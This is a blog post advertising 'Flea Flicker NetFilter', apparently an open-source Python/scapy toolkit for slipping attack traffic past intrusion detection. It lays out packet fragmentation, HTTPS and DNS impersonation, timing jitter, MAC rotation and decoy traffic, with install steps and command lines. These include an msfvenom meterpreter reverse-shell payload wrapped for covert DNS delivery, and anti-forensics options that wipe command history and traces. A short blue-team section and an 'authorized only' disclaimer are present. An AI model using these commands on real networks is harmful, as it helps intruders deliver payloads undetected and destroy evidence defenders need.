Tech Weaponsby The Ghost in The Prompt2026-04-046 min read

Flea Flicker NetFilter: Network Evasion Toolkit

Netfilter hooks for packet manipulation. Deep packet inspection evasion. Protocol impersonation. MAC address rotation. Red team toolkit for penetration testing on authorized networks. Evades IDS, confuses behavioral analysis, fragments payloads, hides in legitimate traffic.

Flea Flicker NetFilter

IDS blocks your scans. ML detects your payloads. Behavioral analysis flags your timing. Your pentest is over before it starts.

Flea Flicker manipulates packets at kernel level—before they hit the network, before IDS sees them. Netfilter hooks. Fragment payloads. Randomize timing. Impersonate protocols. Traffic looks legitimate. IDS sees nothing suspicious. Manual control over packet behavior. Not automated evasion. Not script kiddie tools.

Fragment, Delay, Impersonate: Kernel-Level Evasion

Deep Packet Inspection Evasion

IDS reads packet contents. Pattern matching catches exploits. Signature detection blocks payloads. Flea Flicker fragments your attack across multiple packets: encrypt at the application layer before the network layer, insert random padding between fragments, reassemble only at destination.

Normal Metasploit payload:
[TCP Header][Exploit Code]
↓ IDS sees exploit signature, blocks

Flea Flicker:
[TCP Header][Fragment 1 + Padding]
[TCP Header][Fragment 2 + Padding]
[TCP Header][Fragment 3 + Padding]
↓ IDS sees incomplete fragments, allows
↓ Target reassembles into exploit

Protocol Impersonation

Unusual protocols get flagged. Port scans detected immediately. Make attack traffic look like legitimate services.

Nmap scan on port 445:
→ SMB enumeration detected, blocked

Flea Flicker wrapped Nmap:
→ Packets look like HTTPS traffic on 443
→ Payload hidden in TLS-like structure
→ IDS sees "normal web browsing"
→ Scan proceeds undetected

Timing Randomization

Behavioral analysis detects patterns. Regular intervals mean automated scanning. You get caught. Flea Flicker randomizes delays between packets (0.1s to 5s), injects jitter to mimic human interaction, and throttles volume to stay under detection thresholds. This defeats time-series analysis, rate limiting, and correlation engines that break on temporal clustering.

MAC Address Rotation

Network access control, MAC filtering, device tracking—they know your hardware. Flea Flicker rotates MAC every N packets, spoofs the vendor OUI to look like different hardware, and maintains DHCP lease across rotations. Use case: bypass MAC filtering on WiFi networks during authorized pentest.

Traffic Mimicry

Volume analysis spots anomalies. Attack traffic does not look like normal users. Hide in normal traffic by generating decoy traffic alongside real attacks, matching volume patterns to office hours and usage spikes, and mixing protocols (HTTP, DNS, SMTP). The real attack disappears into noise that looks like a normal user.

Technical Implementation

Built in Python with scapy for packet-layer manipulation. The FleaFlickerEvasion class wraps the core evasion engine. Scapy intercepts at the raw socket level — no kernel module required, no root dependency on compilation. The tradeoff is performance versus portability. This one chose portability.

from flea_flicker_evasion import FleaFlickerEvasion

ff = FleaFlickerEvasion()

# Ghost mode: fragment + randomize timing + protocol impersonation
ff.enable_ghost_mode(
    fragment_size=64,
    delay_range=(0.5, 3.0),
    impersonate_protocol="https"
)

# Shadow mode: MAC rotation + decoy traffic generation
ff.enable_shadow_mode(interface="wlan0", rotation_interval=100)

[Application] → [Payload]
      ↓
[FleaFlickerEvasion interceptor — Python/scapy]
      ↓
[Fragment + Timing Jitter + Protocol Wrap + MAC Rotation]
      ↓
[Modified packets] → [Network]
      ↓
[IDS sees: normal HTTPS traffic, variable timing, rotating hardware IDs]

MAC rotation runs on a thread. Every N packets the interface MAC changes, vendor OUI spoofed to a plausible hardware manufacturer. DHCP lease survives the rotation by reacquiring before the old one expires — the device looks like new hardware joining the network rather than an existing device changing its address.

Real-World Scenario

Objective: enumerate SMB shares on a corporate network with IDS deployed.

Without Flea Flicker:

$ nmap -p 445 --script smb-enum-shares 10.0.0.0/24
→ IDS detects: Port scan + SMB enumeration
→ Alert triggered
→ IP blocked
→ Pentest detected

With Flea Flicker:

$ flea-flicker --mode ghost --protocol https \
  nmap -p 445 --script smb-enum-shares 10.0.0.0/24

→ Packets fragmented across 20-second window
→ Traffic appears as HTTPS on port 443
→ Timing randomized (looks like browsing)
→ IDS sees: Normal web traffic
→ Scan completes undetected
→ Pentest proceeds

Pentest Integration

Metasploit payload wrapping:

# Generate payload
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.0.0.1 LPORT=443 -f raw > payload.bin

# Wrap with Flea Flicker
flea-flicker --wrap payload.bin \
  --protocol dns --fragment-size 64 --delay 0.5-3.0

# Deliver wrapped payload
# Target receives fragments over DNS
# IDS sees legitimate DNS queries
# Payload reassembles and executes

Burp Suite extension:

[Burp Repeater]
     ↓
[Flea Flicker Proxy]
     ↓
[Obfuscated HTTP requests]
     ↓
[Target Web App]

WAF sees fragmented, time-delayed requests
Attack succeeds where direct request blocked

Nmap evasion:

# Standard aggressive scan (detected immediately)
nmap -A -T4 target.com

# Flea Flicker wrapped (evades detection)
flea-flicker --mode shadow --timing random \
  nmap -A -T2 target.com

Installation

git clone https://github.com/ghostintheprompt/flea-flicker-netfilter
cd flea-flicker-netfilter
pip3 install psutil scapy
sudo ./install.sh
python3 netfilter.py --help

Requires Python 3.8+ and root access for raw socket operations. Compatible with Kali, ParrotOS, Ubuntu, Debian. No kernel module compilation — scapy handles packet interception at the raw socket layer.

HACK LOVE BETRAY
COMING SOON

HACK LOVE BETRAY

Mobile-first arcade trench run through leverage, trace burn, and betrayal. The City moves first. You keep up or you get swallowed.

VIEW GAME FILE

Basic Usage

Ghost Mode (DPI evasion):

flea-flicker --mode ghost [command]
flea-flicker --mode ghost nmap -A target.com

Shadow Mode (MAC rotation + traffic mimicry):

flea-flicker --mode shadow --interface wlan0
# Continuous MAC rotation every 100 packets
# Generates decoy traffic automatically

Protocol Impersonation:

flea-flicker --protocol https nmap -p 445 target.com
flea-flicker --protocol dns [command]

Custom configuration:

flea-flicker --fragment-size 64 \
  --delay 0.5-3.0 \
  --protocol https \
  --mac-rotation 100 \
  [command]

Operational Security

Runs memory-only by default. No logs written, configuration in RAM, minimal disk artifacts.

flea-flicker --cleanup
flea-flicker --emergency-shutdown
flea-flicker --self-destruct 60 [command]

Anti-forensics: clears command history entries, wipes kernel module traces, removes temporary files, resets network state.

Built Because ML-Based IDS Killed the Standard Pentest

Built this after a pentest where the client had deployed ML-based IDS. Standard Nmap was instant detection. Metasploit payloads got blocked immediately. Needed packet manipulation before IDS could analyze anything.

Netfilter hooks at kernel level intercept outbound traffic. Fragment payloads. Randomize timing. Impersonate protocols. IDS sees fragmented, delayed traffic that looks legitimate.

Works against commercial IDS/IPS, behavioral analysis, signature detection, and timing correlation. Does not work against deep SSL inspection with client certs, nation-state detection (they analyze everything), or air-gapped networks.

The technique is to understand how each detection method works and evade it systematically. DPI reads content—fragment it. Timing analysis looks for patterns—randomize them. Protocol detection flags unusual traffic—impersonate legitimate services. Behavioral analysis models normal users—generate decoy traffic that matches.

For Red Teams

This gets past commercial defenses. Test in lab first. Understand the evasion techniques. Do not rely on automation—manual control over packet behavior means you decide fragmentation size, timing delays, protocol impersonation. The tool provides capability. You provide intelligence.

For Blue Teams

Learn these techniques because attackers already use them. Update your signatures. Behavioral analysis alone is not enough—you need multi-layer detection: content, timing, volume, and protocol analysis combined.

If a red team can evade your IDS with open-source tools, real attackers already are.

Authorized pentests only. Written permission required. Federal prison is real.

github.com/ghostintheprompt/flea-flicker-netfilter

GhostInThePrompt.com // IDS reads content. Fragment it. Reads timing. Randomize it. Reads protocol. Impersonate it.

Continue Reading

tech-weapons

Amnesia: Scrubbing the Location Data Hidden in Plain Sight

Photographers know better than most how much a single frame reveals. Not just EXIF GPS — the foliage species in the background, the street sign typeface, the reflection in a window, the boutique awning half out of frame. Amnesia is a VLM-powered scrubber that finds and redacts the visual identifiers your metadata strip missed. CLI for local batch processing, browser extension for live site auditing, zero-cloud mode when the asset is sensitive enough that it shouldn't leave your machine.

tech-weapons

Robotics Doesn't Need a Brain to Kill You

The real threat isn't a robot that follows orders. It's a robot making probabilistic guesses ten thousand times per second with no way to tell you why. Adversarial noise, genetic exploits, and fuzzy logic manipulation — the attack surface nobody patched.